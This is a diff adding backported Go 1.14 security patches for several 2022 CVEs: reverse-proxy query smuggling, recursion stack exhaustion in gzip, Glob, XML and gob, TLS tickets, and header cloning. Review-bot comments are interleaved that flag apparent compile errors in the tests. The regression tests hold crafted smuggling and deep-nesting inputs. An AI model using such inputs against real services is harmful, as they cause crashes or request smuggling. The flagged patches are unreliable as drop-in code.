+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-2880.patch
@@ -0,0 +1,164 @@
+From 753e3f8da191c2ac400407d83c70f46900769417 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 27 Oct 2022 12:22:41 +0530
+Subject: [PATCH] CVE-2022-2880
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/9d2c73a9fd69e45876509bb3bdb2af99bf77da1e]
+CVE: CVE-2022-2880
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+net/http/httputil: avoid query parameter
+
+Query parameter smuggling occurs when a proxy's interpretation
+of query parameters differs from that of a downstream server.
+Change ReverseProxy to avoid forwarding ignored query parameters.
+
+Remove unparsable query parameters from the outbound request
+
+ * if req.Form != nil after calling ReverseProxy.Director; and
+ * before calling ReverseProxy.Rewrite.
+
+This change preserves the existing behavior of forwarding the
+raw query untouched if a Director hook does not parse the query
+by calling Request.ParseForm (possibly indirectly).
+---
+ src/net/http/httputil/reverseproxy.go | 36 +++++++++++
+ src/net/http/httputil/reverseproxy_test.go | 74 ++++++++++++++++++++++
+ 2 files changed, 110 insertions(+)
+
+diff --git a/src/net/http/httputil/reverseproxy.go b/src/net/http/httputil/reverseproxy.go
+index 2072a5f..c6fb873 100644
+--- a/src/net/http/httputil/reverseproxy.go
++++ b/src/net/http/httputil/reverseproxy.go
+@@ -212,6 +212,9 @@ func (p *ReverseProxy) ServeHTTP(rw http.ResponseWriter, req *http.Request) {
+ }
+
+ p.Director(outreq)
++ if outreq.Form != nil {
++ outreq.URL.RawQuery = cleanQueryParams(outreq.URL.RawQuery)
++ }
+ outreq.Close = false
+
+ reqUpType := upgradeType(outreq.Header)
+@@ -561,3 +564,36 @@ func (c switchProtocolCopier) copyToBackend(errc chan<- error) {
+ _, err := io.Copy(c.backend, c.user)
+ errc <- err
+ }
++
++func cleanQueryParams(s string) string {
++ reencode := func(s string) string {
++ v, _ := url.ParseQuery(s)
++ return v.Encode()
++ }
++ for i := 0; i < len(s); {
++ switch s[i] {
++ case ';':
++ return reencode(s)
++ case '%':
++ if i+2 >= len(s) || !ishex(s[i+1]) || !ishex(s[i+2]) {
++ return reencode(s)
++ }
++ i += 3
++ default:
++ i++
++ }
++ }
++ return s
++}
++
++func ishex(c byte) bool {
++ switch {
++ case '0' <= c && c <= '9':
++ return true
++ case 'a' <= c && c <= 'f':
++ return true
++ case 'A' <= c && c <= 'F':
++ return true
++ }
++ return false
++}
+diff --git a/src/net/http/httputil/reverseproxy_test.go b/src/net/http/httputil/reverseproxy_test.go
+index 9a7223a..bc87a3b 100644
+--- a/src/net/http/httputil/reverseproxy_test.go
++++ b/src/net/http/httputil/reverseproxy_test.go
+@@ -1269,3 +1269,77 @@ func TestSingleJoinSlash(t *testing.T) {
+ }
+ }
+ }
++
++const (
++ testWantsCleanQuery = true
++ testWantsRawQuery = false
++)
++
++func TestReverseProxyQueryParameterSmugglingDirectorDoesNotParseForm(t *testing.T) {
++ testReverseProxyQueryParameterSmuggling(t, testWantsRawQuery, func(u *url.URL) *ReverseProxy {
++ proxyHandler := NewSingleHostReverseProxy(u)
++ oldDirector := proxyHandler.Director
++ proxyHandler.Director = func(r *http.Request) {
++ oldDirector(r)
++ }
++ return proxyHandler
++ })
++}
++
++func TestReverseProxyQueryParameterSmugglingDirectorParsesForm(t *testing.T) {
++ testReverseProxyQueryParameterSmuggling(t, testWantsCleanQuery, func(u *url.URL) *ReverseProxy {
++ proxyHandler := NewSingleHostReverseProxy(u)
++ oldDirector := proxyHandler.Director
++ proxyHandler.Director = func(r *http.Request) {
++ // Parsing the form causes ReverseProxy to remove unparsable
++ // query parameters before forwarding.
++ r.FormValue("a")
++ oldDirector(r)
++ }
++ return proxyHandler
++ })
++}
++
++func testReverseProxyQueryParameterSmuggling(t *testing.T, wantCleanQuery bool, newProxy func(*url.URL) *ReverseProxy) {
++ const content = "response_content"
++ backend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
++ w.Write([]byte(r.URL.RawQuery))
++ }))
++ defer backend.Close()
++ backendURL, err := url.Parse(backend.URL)
++ if err != nil {
++ t.Fatal(err)
++ }
++ proxyHandler := newProxy(backendURL)
++ frontend := httptest.NewServer(proxyHandler)
++ defer frontend.Close()
++
++ // Don't spam output with logs of queries containing semicolons.
++ backend.Config.ErrorLog = log.New(io.Discard, "", 0)
++ frontend.Config.ErrorLog = log.New(io.Discard, "", 0)
++
++ for _, test := range []struct {
++ rawQuery string
++ cleanQuery string
++ }{{
++ rawQuery: "a=1&a=2;b=3",
++ cleanQuery: "a=1",
++ }, {
++ rawQuery: "a=1&a=%zz&b=3",
++ cleanQuery: "a=1&b=3",
++ }} {
++ res, err := frontend.Client().Get(frontend.URL + "?" + test.rawQuery)
++ if err != nil {
++ t.Fatalf("Get: %v", err)
++ }
++ defer res.Body.Close()
++ body, _ := io.ReadAll(res.Body)
++ wantQuery := test.rawQuery
++ if wantCleanQuery {
++ wantQuery = test.cleanQuery
++ }
++ if got, want := string(body), wantQuery; got != want {
++ t.Errorf("proxy forwarded raw query %q as %q, want %q", test.rawQuery, got, want)
++ }
++ }
++}
+--
+2.25.1
+
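Review bot: The added test in reverseproxy_test.go calls `io.Discard` and `io.ReadAll`, which entered package io in Go 1.16, so on this go-1.14 tree the test file would presumably not compile; `ioutil.Discard` and `ioutil.ReadAll` are the equivalents available there. The expected value `cleanQuery: "a=1"` for `a=1&a=2;b=3` also assumes a `url.ParseQuery` that rejects semicolons, which I believe the 1.14 net/url does not do, so that expectation should be checked against this tree. Separately, `cleanQueryParams` drops the `url.ParseQuery` error without explanation; a comment such as `// Parse errors are ignored on purpose: only the parameters that parsed are forwarded.` would make the intent explicit.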
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-30629.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-30629.patch
new file mode 100644
index 0000000000..47313a547f
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-30629.patch
@@ -0,0 +1,47 @@
+From 8d0bbb5a6280c2cf951241ec7f6579c90d38df57 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 25 Aug 2022 10:55:08 +0530
+Subject: [PATCH] CVE-2022-30629
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/c15a8e2dbb5ac376a6ed890735341b812d6b965c]
+CVE: CVE-2022-30629
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/crypto/tls/handshake_server_tls13.go | 14 ++++++++++++++
+ 1 file changed, 14 insertions(+)
+
+diff --git a/src/crypto/tls/handshake_server_tls13.go b/src/crypto/tls/handshake_server_tls13.go
+index 5432145..d91797e 100644
+--- a/src/crypto/tls/handshake_server_tls13.go
++++ b/src/crypto/tls/handshake_server_tls13.go
+@@ -9,6 +9,7 @@ import (
+ "crypto"
+ "crypto/hmac"
+ "crypto/rsa"
++ "encoding/binary"
+ "errors"
+ "hash"
+ "io"
+@@ -742,6 +743,19 @@ func (hs *serverHandshakeStateTLS13) sendSessionTickets() error {
+ }
+ m.lifetime = uint32(maxSessionTicketLifetime / time.Second)
+
++ // ticket_age_add is a random 32-bit value. See RFC 8446, section 4.6.1
++ // The value is not stored anywhere; we never need to check the ticket age
++ // because 0-RTT is not supported.
++ ageAdd := make([]byte, 4)
++ _, err = hs.c.config.rand().Read(ageAdd)
++ if err != nil {
++ return err
++ }
++ m.ageAdd = binary.LittleEndian.Uint32(ageAdd)
++
++ // ticket_nonce, which must be unique per connection, is always left at
++ // zero because we only ever send one ticket per connection.
++
+ if _, err := c.writeRecord(recordTypeHandshake, m.marshal()); err != nil {
+ return err
+ }
+--
+2.25.1
+
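Review bot: `hs.c.config.rand().Read(ageAdd)` in sendSessionTickets discards the byte count, so a reader that returns fewer than four bytes without an error would leave part of `ageAdd` at zero. Using `if _, err = io.ReadFull(hs.c.config.rand(), ageAdd); err != nil { return err }` closes that gap, and `io` is already in this file's import list. Whether the configured reader can short-read is not visible here. The function starts and ends outside the hunk, including the declaration of `err`.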
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-30631.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-30631.patch
new file mode 100644
index 0000000000..5dcfd27f16
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-30631.patch
@@ -0,0 +1,116 @@
+From d10fc3a84e3344f2421c1dd3046faa50709ab4d5 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 25 Aug 2022 11:01:21 +0530
+Subject: [PATCH] CVE-2022-30631
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/0117dee7dccbbd7803d88f65a2ce8bd686219ad3]
+CVE: CVE-2022-30631
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/compress/gzip/gunzip.go | 60 +++++++++++++++-----------------
+ src/compress/gzip/gunzip_test.go | 16 +++++++++
+ 2 files changed, 45 insertions(+), 31 deletions(-)
+
+diff --git a/src/compress/gzip/gunzip.go b/src/compress/gzip/gunzip.go
+index 924bce1..237b2b9 100644
+--- a/src/compress/gzip/gunzip.go
++++ b/src/compress/gzip/gunzip.go
+@@ -248,42 +248,40 @@ func (z *Reader) Read(p []byte) (n int, err error) {
+ return 0, z.err
+ }
+
+- n, z.err = z.decompressor.Read(p)
+- z.digest = crc32.Update(z.digest, crc32.IEEETable, p[:n])
+- z.size += uint32(n)
+- if z.err != io.EOF {
+- // In the normal case we return here.
+- return n, z.err
+- }
++ for n == 0 {
++ n, z.err = z.decompressor.Read(p)
++ z.digest = crc32.Update(z.digest, crc32.IEEETable, p[:n])
++ z.size += uint32(n)
++ if z.err != io.EOF {
++ // In the normal case we return here.
++ return n, z.err
++ }
+
+- // Finished file; check checksum and size.
+- if _, err := io.ReadFull(z.r, z.buf[:8]); err != nil {
+- z.err = noEOF(err)
+- return n, z.err
+- }
+- digest := le.Uint32(z.buf[:4])
+- size := le.Uint32(z.buf[4:8])
+- if digest != z.digest || size != z.size {
+- z.err = ErrChecksum
+- return n, z.err
+- }
+- z.digest, z.size = 0, 0
++ // Finished file; check checksum and size.
++ if _, err := io.ReadFull(z.r, z.buf[:8]); err != nil {
++ z.err = noEOF(err)
++ return n, z.err
++ }
++ digest := le.Uint32(z.buf[:4])
++ size := le.Uint32(z.buf[4:8])
++ if digest != z.digest || size != z.size {
++ z.err = ErrChecksum
++ return n, z.err
++ }
++ z.digest, z.size = 0, 0
+
+- // File is ok; check if there is another.
+- if !z.multistream {
+- return n, io.EOF
+- }
+- z.err = nil // Remove io.EOF
++ // File is ok; check if there is another.
++ if !z.multistream {
++ return n, io.EOF
++ }
++ z.err = nil // Remove io.EOF
+
+- if _, z.err = z.readHeader(); z.err != nil {
+- return n, z.err
++ if _, z.err = z.readHeader(); z.err != nil {
++ return n, z.err
++ }
+ }
+
+- // Read from next file, if necessary.
+- if n > 0 {
+- return n, nil
+- }
+- return z.Read(p)
++ return n, nil
+ }
+
+ // Close closes the Reader. It does not close the underlying io.Reader.
+diff --git a/src/compress/gzip/gunzip_test.go b/src/compress/gzip/gunzip_test.go
+index 1b01404..95220ae 100644
+--- a/src/compress/gzip/gunzip_test.go
++++ b/src/compress/gzip/gunzip_test.go
+@@ -516,3 +516,19 @@ func TestTruncatedStreams(t *testing.T) {
+ }
+ }
+ }
++
++func TestCVE202230631(t *testing.T) {
++ var empty = []byte{0x1f, 0x8b, 0x08, 0x00, 0xa7, 0x8f, 0x43, 0x62, 0x00,
++ 0x03, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}
++ r := bytes.NewReader(bytes.Repeat(empty, 4e6))
++ z, err := NewReader(r)
++ if err != nil {
++ t.Fatalf("NewReader: got %v, want nil", err)
++ }
++ // Prior to CVE-2022-30631 fix, this would cause an unrecoverable panic due
++ // to stack exhaustion.
++ _, err = z.Read(make([]byte, 10))
++ if err != io.EOF {
++ t.Errorf("Reader.Read: got %v, want %v", err, io.EOF)
++ }
++}
+--
+2.25.1
+
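Review bot: The new `for n == 0` loop in Reader.Read has no comment saying why it replaces the tail call `z.Read(p)`, and the patch header carries no description either. I would add `// Loop rather than recurse: a long run of empty members must not grow the stack.` directly above the loop. The added test builds its input with `bytes.Repeat(empty, 4e6)`, roughly 80 MB for the 20-byte member, which is worth knowing for memory-constrained test runs.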
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-30632.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-30632.patch
new file mode 100644
index 0000000000..c54ef56a0e
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-30632.patch
@@ -0,0 +1,71 @@
+From 35d1dfe9746029aea9027b405c75555d41ffd2f8 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 25 Aug 2022 13:12:40 +0530
+Subject: [PATCH] CVE-2022-30632
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/76f8b7304d1f7c25834e2a0cc9e88c55276c47df]
+CVE: CVE-2022-30632
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/path/filepath/match.go | 16 +++++++++++++++-
+ src/path/filepath/match_test.go | 10 ++++++++++
+ 2 files changed, 25 insertions(+), 1 deletion(-)
+
+diff --git a/src/path/filepath/match.go b/src/path/filepath/match.go
+index 46badb5..ba68daa 100644
+--- a/src/path/filepath/match.go
++++ b/src/path/filepath/match.go
+@@ -232,6 +232,20 @@ func getEsc(chunk string) (r rune, nchunk string, err error) {
+ // The only possible returned error is ErrBadPattern, when pattern
+ // is malformed.
+ func Glob(pattern string) (matches []string, err error) {
++ return globWithLimit(pattern, 0)
++}
++
++func globWithLimit(pattern string, depth int) (matches []string, err error) {
++ // This limit is used prevent stack exhaustion issues. See CVE-2022-30632.
++ const pathSeparatorsLimit = 10000
++ if depth == pathSeparatorsLimit {
++ return nil, ErrBadPattern
++ }
++
++ // Check pattern is well-formed.
++ if _, err := Match(pattern, ""); err != nil {
++ return nil, err
++ }
+ if !hasMeta(pattern) {
+ if _, err = os.Lstat(pattern); err != nil {
+ return nil, nil
+@@ -257,7 +271,7 @@ func Glob(pattern string) (matches []string, err error) {
+ }
+
+ var m []string
+- m, err = Glob(dir)
++ m, err = globWithLimit(dir, depth+1)
+ if err != nil {
+ return
+ }
+diff --git a/src/path/filepath/match_test.go b/src/path/filepath/match_test.go
+index b865762..c37c812 100644
+--- a/src/path/filepath/match_test.go
++++ b/src/path/filepath/match_test.go
+@@ -154,6 +154,16 @@ func TestGlob(t *testing.T) {
+ }
+ }
+
++func TestCVE202230632(t *testing.T) {
++ // Prior to CVE-2022-30632, this would cause a stack exhaustion given a
++ // large number of separators (more than 4,000,000). There is now a limit
++ // of 10,000.
++ _, err := Glob("/*" + strings.Repeat("/", 10001))
++ if err != ErrBadPattern {
++ t.Fatalf("Glob returned err=%v, want ErrBadPattern", err)
++ }
++}
++
+ func TestGlobError(t *testing.T) {
+ _, err := Glob("[]")
+ if err == nil {
+--
+2.25.1
+
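Review bot: Glob's doc comment still says the only possible error is ErrBadPattern "when pattern is malformed", but `globWithLimit` now also returns it for a well-formed pattern once `depth` reaches `pathSeparatorsLimit`. The comment should cover that case, for example `// is malformed or nests deeper than the internal recursion limit.` The new helper has no doc comment of its own, and its inline comment reads "is used prevent" where "is used to prevent" is meant. Comparing with `depth >= pathSeparatorsLimit` instead of `==` would also keep the guard effective if a caller ever passes a larger starting depth. The body of the function continues outside the hunk.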
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-30633.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-30633.patch
new file mode 100644
index 0000000000..c16cb5f50c
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-30633.patch
@@ -0,0 +1,131 @@
+From ab6e2ffdcab0501bcc2de4b196c1c18ae2301d4b Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 25 Aug 2022 13:29:55 +0530
+Subject: [PATCH] CVE-2022-30633
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/2678d0c957193dceef336c969a9da74dd716a827]
+CVE: CVE-2022-30633
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/encoding/xml/read.go | 27 +++++++++++++++++++--------
+ src/encoding/xml/read_test.go | 14 ++++++++++++++
+ 2 files changed, 33 insertions(+), 8 deletions(-)
+
+diff --git a/src/encoding/xml/read.go b/src/encoding/xml/read.go
+index 10a60ee..4ffed80 100644
+--- a/src/encoding/xml/read.go
++++ b/src/encoding/xml/read.go
+@@ -148,7 +148,7 @@ func (d *Decoder) DecodeElement(v interface{}, start *StartElement) error {
+ if val.Kind() != reflect.Ptr {
+ return errors.New("non-pointer passed to Unmarshal")
+ }
+- return d.unmarshal(val.Elem(), start)
++ return d.unmarshal(val.Elem(), start, 0)
+ }
+
+ // An UnmarshalError represents an error in the unmarshaling process.
+@@ -304,8 +304,15 @@ var (
+ textUnmarshalerType = reflect.TypeOf((*encoding.TextUnmarshaler)(nil)).Elem()
+ )
+
++const maxUnmarshalDepth = 10000
++
++var errExeceededMaxUnmarshalDepth = errors.New("exceeded max depth")
++
+ // Unmarshal a single XML element into val.
+-func (d *Decoder) unmarshal(val reflect.Value, start *StartElement) error {
++func (d *Decoder) unmarshal(val reflect.Value, start *StartElement, depth int) error {
++ if depth >= maxUnmarshalDepth {
++ return errExeceededMaxUnmarshalDepth
++ }
+ // Find start element if we need it.
+ if start == nil {
+ for {
+@@ -398,7 +405,7 @@ func (d *Decoder) unmarshal(val reflect.Value, start *StartElement) error {
+ v.Set(reflect.Append(val, reflect.Zero(v.Type().Elem())))
+
+ // Recur to read element into slice.
+- if err := d.unmarshal(v.Index(n), start); err != nil {
++ if err := d.unmarshal(v.Index(n), start, depth+1); err != nil {
+ v.SetLen(n)
+ return err
+ }
+@@ -521,13 +528,15 @@ Loop:
+ case StartElement:
+ consumed := false
+ if sv.IsValid() {
+- consumed, err = d.unmarshalPath(tinfo, sv, nil, &t)
++ // unmarshalPath can call unmarshal, so we need to pass the depth through so that
++ // we can continue to enforce the maximum recusion limit.
++ consumed, err = d.unmarshalPath(tinfo, sv, nil, &t, depth)
+ if err != nil {
+ return err
+ }
+ if !consumed && saveAny.IsValid() {
+ consumed = true
+- if err := d.unmarshal(saveAny, &t); err != nil {
++ if err := d.unmarshal(saveAny, &t, depth+1); err != nil {
+ return err
+ }
+ }
+@@ -672,7 +681,7 @@ func copyValue(dst reflect.Value, src []byte) (err error) {
+ // The consumed result tells whether XML elements have been consumed
+ // from the Decoder until start's matching end element, or if it's
+ // still untouched because start is uninteresting for sv's fields.
+-func (d *Decoder) unmarshalPath(tinfo *typeInfo, sv reflect.Value, parents []string, start *StartElement) (consumed bool, err error) {
++func (d *Decoder) unmarshalPath(tinfo *typeInfo, sv reflect.Value, parents []string, start *StartElement, depth int) (consumed bool, err error) {
+ recurse := false
+ Loop:
+ for i := range tinfo.fields {
+@@ -687,7 +696,7 @@ Loop:
+ }
+ if len(finfo.parents) == len(parents) && finfo.name == start.Name.Local {
+ // It's a perfect match, unmarshal the field.
+- return true, d.unmarshal(finfo.value(sv), start)
++ return true, d.unmarshal(finfo.value(sv), start, depth+1)
+ }
+ if len(finfo.parents) > len(parents) && finfo.parents[len(parents)] == start.Name.Local {
+ // It's a prefix for the field. Break and recurse
+@@ -716,7 +725,9 @@ Loop:
+ }
+ switch t := tok.(type) {
+ case StartElement:
+- consumed2, err := d.unmarshalPath(tinfo, sv, parents, &t)
++ // the recursion depth of unmarshalPath is limited to the path length specified
++ // by the struct field tag, so we don't increment the depth here.
++ consumed2, err := d.unmarshalPath(tinfo, sv, parents, &t, depth)
+ if err != nil {
+ return true, err
+ }
+diff --git a/src/encoding/xml/read_test.go b/src/encoding/xml/read_test.go
+index 8c2e70f..6a20b1a 100644
+--- a/src/encoding/xml/read_test.go
++++ b/src/encoding/xml/read_test.go
+@@ -5,6 +5,7 @@
+ package xml
+
+ import (
++ "errors"
+ "io"
+ "reflect"
+ "strings"
+@@ -1079,3 +1080,16 @@ func TestUnmarshalWhitespaceAttrs(t *testing.T) {
+ t.Fatalf("whitespace attrs: Unmarshal:\nhave: %#+v\nwant: %#+v", v, want)
+ }
+ }
++
++func TestCVE202228131(t *testing.T) {
++ type nested struct {
++ Parent *nested `xml:",any"`
++ }
++ var n nested
++ err := Unmarshal(bytes.Repeat([]byte("<a>"), maxUnmarshalDepth+1), &n)
++ if err == nil {
++ t.Fatal("Unmarshal did not fail")
++ } else if !errors.Is(err, errExeceededMaxUnmarshalDepth) {
++ t.Fatalf("Unmarshal unexpected error: got %q, want %q", err, errExeceededMaxUnmarshalDepth)
++ }
++}
+--
+2.25.1
+
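Review bot: The new test in read_test.go calls `bytes.Repeat`, but the import hunk for that file only adds `"errors"`, and the context around it shows `"io"` following directly, so `bytes` does not appear to be imported. The import block should also gain `"bytes"` ahead of `"errors"`, otherwise the package's tests would fail to compile. The test is named `TestCVE202228131` although this patch is for CVE-2022-30633 and exercises Unmarshal; `TestCVE202230633` would match. The identifier `errExeceededMaxUnmarshalDepth` and the comment word "recusion" are misspelled, which is harmless but makes the error harder to grep for.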
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-30635.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-30635.patch
new file mode 100644
index 0000000000..73959f70fa
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-30635.patch
@@ -0,0 +1,120 @@
+From fdd4316737ed5681689a1f40802ffa0805e5b11c Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 26 Aug 2022 12:17:05 +0530
+Subject: [PATCH] CVE-2022-30635
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/cd54600b866db0ad068ab8df06c7f5f6cb55c9b3]
+CVE-2022-30635
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/encoding/gob/decode.go | 19 ++++++++++++-------
+ src/encoding/gob/gobencdec_test.go | 24 ++++++++++++++++++++++++
+ 2 files changed, 36 insertions(+), 7 deletions(-)
+
+diff --git a/src/encoding/gob/decode.go b/src/encoding/gob/decode.go
+index d2f6c74..0e0ec75 100644
+--- a/src/encoding/gob/decode.go
++++ b/src/encoding/gob/decode.go
+@@ -871,8 +871,13 @@ func (dec *Decoder) decOpFor(wireId typeId, rt reflect.Type, name string, inProg
+ return &op
+ }
+
++var maxIgnoreNestingDepth = 10000
++
+ // decIgnoreOpFor returns the decoding op for a field that has no destination.
+-func (dec *Decoder) decIgnoreOpFor(wireId typeId, inProgress map[typeId]*decOp) *decOp {
++func (dec *Decoder) decIgnoreOpFor(wireId typeId, inProgress map[typeId]*decOp, depth int) *decOp {
++ if depth > maxIgnoreNestingDepth {
++ error_(errors.New("invalid nesting depth"))
++ }
+ // If this type is already in progress, it's a recursive type (e.g. map[string]*T).
+ // Return the pointer to the op we're already building.
+ if opPtr := inProgress[wireId]; opPtr != nil {
+@@ -896,7 +901,7 @@ func (dec *Decoder) decIgnoreOpFor(wireId typeId, inProgress map[typeId]*decOp)
+ errorf("bad data: undefined type %s", wireId.string())
+ case wire.ArrayT != nil:
+ elemId := wire.ArrayT.Elem
+- elemOp := dec.decIgnoreOpFor(elemId, inProgress)
++ elemOp := dec.decIgnoreOpFor(elemId, inProgress, depth+1)
+ op = func(i *decInstr, state *decoderState, value reflect.Value) {
+ state.dec.ignoreArray(state, *elemOp, wire.ArrayT.Len)
+ }
+@@ -904,15 +909,15 @@ func (dec *Decoder) decIgnoreOpFor(wireId typeId, inProgress map[typeId]*decOp)
+ case wire.MapT != nil:
+ keyId := dec.wireType[wireId].MapT.Key
+ elemId := dec.wireType[wireId].MapT.Elem
+- keyOp := dec.decIgnoreOpFor(keyId, inProgress)
+- elemOp := dec.decIgnoreOpFor(elemId, inProgress)
++ keyOp := dec.decIgnoreOpFor(keyId, inProgress, depth+1)
++ elemOp := dec.decIgnoreOpFor(elemId, inProgress, depth+1)
+ op = func(i *decInstr, state *decoderState, value reflect.Value) {
+ state.dec.ignoreMap(state, *keyOp, *elemOp)
+ }
+
+ case wire.SliceT != nil:
+ elemId := wire.SliceT.Elem
+- elemOp := dec.decIgnoreOpFor(elemId, inProgress)
++ elemOp := dec.decIgnoreOpFor(elemId, inProgress, depth+1)
+ op = func(i *decInstr, state *decoderState, value reflect.Value) {
+ state.dec.ignoreSlice(state, *elemOp)
+ }
+@@ -1073,7 +1078,7 @@ func (dec *Decoder) compileSingle(remoteId typeId, ut *userTypeInfo) (engine *de
+ func (dec *Decoder) compileIgnoreSingle(remoteId typeId) *decEngine {
+ engine := new(decEngine)
+ engine.instr = make([]decInstr, 1) // one item
+- op := dec.decIgnoreOpFor(remoteId, make(map[typeId]*decOp))
++ op := dec.decIgnoreOpFor(remoteId, make(map[typeId]*decOp), 0)
+ ovfl := overflow(dec.typeString(remoteId))
+ engine.instr[0] = decInstr{*op, 0, nil, ovfl}
+ engine.numInstr = 1
+@@ -1118,7 +1123,7 @@ func (dec *Decoder) compileDec(remoteId typeId, ut *userTypeInfo) (engine *decEn
+ localField, present := srt.FieldByName(wireField.Name)
+ // TODO(r): anonymous names
+ if !present || !isExported(wireField.Name) {
+- op := dec.decIgnoreOpFor(wireField.Id, make(map[typeId]*decOp))
++ op := dec.decIgnoreOpFor(wireField.Id, make(map[typeId]*decOp), 0)
+ engine.instr[fieldnum] = decInstr{*op, fieldnum, nil, ovfl}
+ continue
+ }
+diff --git a/src/encoding/gob/gobencdec_test.go b/src/encoding/gob/gobencdec_test.go
+index 6d2c8db..1b52ecc 100644
+--- a/src/encoding/gob/gobencdec_test.go
++++ b/src/encoding/gob/gobencdec_test.go
+@@ -12,6 +12,7 @@ import (
+ "fmt"
+ "io"
+ "net"
++ "reflect"
+ "strings"
+ "testing"
+ "time"
+@@ -796,3 +797,26 @@ func TestNetIP(t *testing.T) {
+ t.Errorf("decoded to %v, want 1.2.3.4", ip.String())
+ }
+ }
++
++func TestIngoreDepthLimit(t *testing.T) {
++ // We don't test the actual depth limit because it requires building an
++ // extremely large message, which takes quite a while.
++ oldNestingDepth := maxIgnoreNestingDepth
++ maxIgnoreNestingDepth = 100
++ defer func() { maxIgnoreNestingDepth = oldNestingDepth }()
++ b := new(bytes.Buffer)
++ enc := NewEncoder(b)
++ typ := reflect.TypeOf(int(0))
++ nested := reflect.ArrayOf(1, typ)
++ for i := 0; i < 100; i++ {
++ nested = reflect.ArrayOf(1, nested)
++ }
++ badStruct := reflect.New(reflect.StructOf([]reflect.StructField{{Name: "F", Type: nested}}))
++ enc.Encode(badStruct.Interface())
++ dec := NewDecoder(b)
++ var output struct{ Hello int }
++ expectedErr := "invalid nesting depth"
++ if err := dec.Decode(&output); err == nil || err.Error() != expectedErr {
++ t.Errorf("Decode didn't fail with depth limit of 100: want %q, got %q", expectedErr, err)
++ }
++}
+--
+2.25.1
+
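Review bot: The header of this patch has a bare `CVE-2022-30635` line where every other patch in this series uses the tagged form, so it should read `CVE: CVE-2022-30635`. Tooling that looks for the tag inside the patch body may otherwise miss it, although the file name still carries the identifier. In the added test, the result of `enc.Encode(badStruct.Interface())` is ignored; checking it with `if err := enc.Encode(badStruct.Interface()); err != nil { t.Fatal(err) }` would keep an encoding failure from being mistaken for the decode error under test. The test name `TestIngoreDepthLimit` is presumably meant to be `TestIgnoreDepthLimit`.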
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-32148.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-32148.patch
new file mode 100644
index 0000000000..aab98e99fd
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-32148.patch
@@ -0,0 +1,49 @@
+From 0fe3adec199e8cd2c101933f75d8cd617de70350 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 26 Aug 2022 12:48:13 +0530
+Subject: [PATCH] CVE-2022-32148
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/ed2f33e1a7e0d18f61bd56f7ee067331d612c27e]
+CVE: CVE-2022-32148
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/net/http/header.go | 6 ++++++
+ src/net/http/header_test.go | 5 +++++
+ 2 files changed, 11 insertions(+)
+
+diff --git a/src/net/http/header.go b/src/net/http/header.go
+index b9b5391..221f613 100644
+--- a/src/net/http/header.go
++++ b/src/net/http/header.go
+@@ -100,6 +100,12 @@ func (h Header) Clone() Header {
+ sv := make([]string, nv) // shared backing array for headers' values
+ h2 := make(Header, len(h))
+ for k, vv := range h {
++ if vv == nil {
++ // Preserve nil values. ReverseProxy distinguishes
++ // between nil and zero-length header values.
++ h2[k] = nil
++ continue
++ }
+ n := copy(sv, vv)
+ h2[k] = sv[:n:n]
+ sv = sv[n:]
+diff --git a/src/net/http/header_test.go b/src/net/http/header_test.go
+index 4789362..80c0035 100644
+--- a/src/net/http/header_test.go
++++ b/src/net/http/header_test.go
+@@ -235,6 +235,11 @@ func TestCloneOrMakeHeader(t *testing.T) {
+ in: Header{"foo": {"bar"}},
+ want: Header{"foo": {"bar"}},
+ },
++ {
++ name: "nil value",
++ in: Header{"foo": nil},
++ want: Header{"foo": nil},
++ },
+ }
+
+ for _, tt := range tests {
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-32189.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-32189.patch
new file mode 100644
index 0000000000..15fda7de1b
--- /dev/null
